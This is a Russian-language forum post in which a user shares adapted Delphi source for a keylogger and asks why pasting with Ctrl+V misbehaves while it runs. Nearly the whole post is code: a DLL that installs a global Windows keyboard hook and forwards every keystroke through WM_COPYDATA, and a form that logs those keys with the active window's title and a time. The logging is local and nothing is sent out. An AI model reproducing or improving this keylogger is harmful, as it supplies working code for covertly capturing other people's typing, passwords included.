ETUN4 | Дата: Пятница, 27.02.2015, 00:28 | Сообщение # 1 |
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| Всем привет!) Вот нашёл пример кейлоггера, немного его переделал, и вот что у меня вышло. Когда он работает, комбинация клавиш для вставки Ctrl+V срабатывает примерно один раз из шести. Заранее скопированный текс вставляется в поле мемо кейлоггера, а по теории должен бы в оба окна. Вот код программы: Код unit UMain; interface
uses Windows, Messages, SysUtils, Forms, StdCtrls, Classes, Controls;
type TForm1 = class(TForm) TmpMemo: TMemo; procedure FormClose(Sender: TObject; var Action: TCloseAction); procedure FormCreate(Sender: TObject); public function VentanaActiva: string; procedure OnWmCopyData(var Msg: TMessage);message WM_COPYDATA; end;
Const DllName='HooK_DLL'; Var Form1: TForm1; StrVentanaActiva: String;
Function BeginKeybrdHook(HDest: THandle):Boolean;stdcall;external DllName; Procedure EndKeybrdHook ;stdcall;external DllName;
{$R *.dfm} type PKeybrdInfo = ^TKeybrdInfo; TKeybrdInfo = record VirtualKey : Integer; KeyStore : Integer; CurrentProcessId: Cardinal; CurrentControl: Cardinal; WindowHwnd: Cardinal; end;
procedure TForm1.OnWmCopyData(var Msg: TMessage); begin if Msg.WParam = 1 then with PKeybrdInfo(PCopyDataStruct(Msg.LParam)^.lpData)^ do begin if VentanaActiva()<>StrVentanaActiva then begin StrVentanaActiva:=VentanaActiva(); TmpMemo.Lines.Add('--->' + StrVentanaActiva + ' ' + TimeToStr(Now)); end;
if (KeyStore and $80000000)=0 then begin PostMessage(TmpMemo.Handle,WM_KEYDOWN,VirtualKey,KeyStore); end else begin PostMessage(TmpMemo.Handle,WM_KEYUP,VirtualKey,KeyStore); end; end; end;
function TForm1.VentanaActiva: string; var Handle:THandle; Len:LongInt; Title:string; begin Handle:=GetForegroundWindow; Len:=GetWindowTextLength(Handle) + 1; SetLength(Title,Len); GetWindowText(Handle,PChar(Title),Len); If Length(TrimRight(Title)) = 0 then begin Title:= 'Unknow Window'; end; Result:=TrimRight(Title); end;
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction); begin EndKeybrdHook; end;
procedure TForm1.FormCreate(Sender: TObject); begin BeginKeybrdHook(Handle); end;
И вот длл: Код library HooK_DLL;
uses SysUtils, Windows, Messages, Classes, Dialogs;
{$R *.res} type PTMapFile = ^TMapFile; TMapFile = record HKeybrdHook: Cardinal; HKeybrdDestWindow : Cardinal; end;
TKeybrdInfo = record VirtualKey : Integer; KeyStore : Integer; CurrentProcessId: Cardinal; CurrentControl: Cardinal; WindowHwnd: Cardinal; end;
var HMapFile : Cardinal=0; PMapFile : PTMapFile=nil;
function KeyboardProc(Code: integer; VirtualKeyCode: WPARAM; KeyStoreMsgInfo: LPARAM):LRESULT; stdcall; var KeybrdInfo: TKeybrdInfo; CopyDataStruct: TCopyDataStruct; begin Result:=0; if Code= HC_ACTION then begin KeybrdInfo.VirtualKey:= VirtualKeyCode; KeybrdInfo.KeyStore := KeyStoreMsgInfo; KeybrdInfo.CurrentProcessId:= GetCurrentProcessId; KeybrdInfo.CurrentControl:= GetFocus; KeybrdInfo.WindowHwnd:= GetActiveWindow; CopyDataStruct.cbData:= SizeOf(KeybrdInfo); CopyDataStruct.lpData:= @KeybrdInfo; SendMessage(PMapFile^.HKeybrdDestWindow,WM_COPYDATA,1,LongInt(@CopyDataStruct)); end; if Code< HC_ACTION then Result:= CallNextHookEx(PMapFile^.HKeybrdHook,Code,VirtualKeyCode,KeyStoreMsgInfo); end;
function BeginKeybrdHook(HDest: THandle): Boolean;stdcall; begin Result:= False; if (HDest<>0) and (PMapFile^.HKeybrdHook=0) then begin PMapFile^.HKeybrdDestWindow:= HDest; PMapFile^.HKeybrdHook:= SetWindowsHookEx(WH_KEYBOARD,@KeyboardProc,HInstance,0); Result:= True; end; end;
procedure EndKeybrdHook;stdcall; begin UnhookWindowsHookEx(PMapFile^.HKeybrdHook); PMapFile^.HKeybrdDestWindow:=0; PMapFile^.HKeybrdHook:=0; end;
Procedure LibraryProc(Reason:Integer); begin case Reason of DLL_PROCESS_ATTACH: Begin HMapFile := CreateFileMapping($FFFFFFFF,nil,PAGE_READWRITE,0,sizeof(TMapFile),'NMB HOOK'); PMapFile := MapViewOfFile(HMapFile,FILE_MAP_WRITE,0, 0,0); end; DLL_PROCESS_DETACH: begin UnmapViewOfFile(PMapFile); CloseHandle(HMapFile); end; end; end;
Exports BeginKeybrdHook; Exports EndKeybrdHook;
begin DllProc:= @LibraryProc; LibraryProc(DLL_PROCESS_ATTACH); end.
Сообщение отредактировал ETUN4 - Пятница, 27.02.2015, 17:56 |
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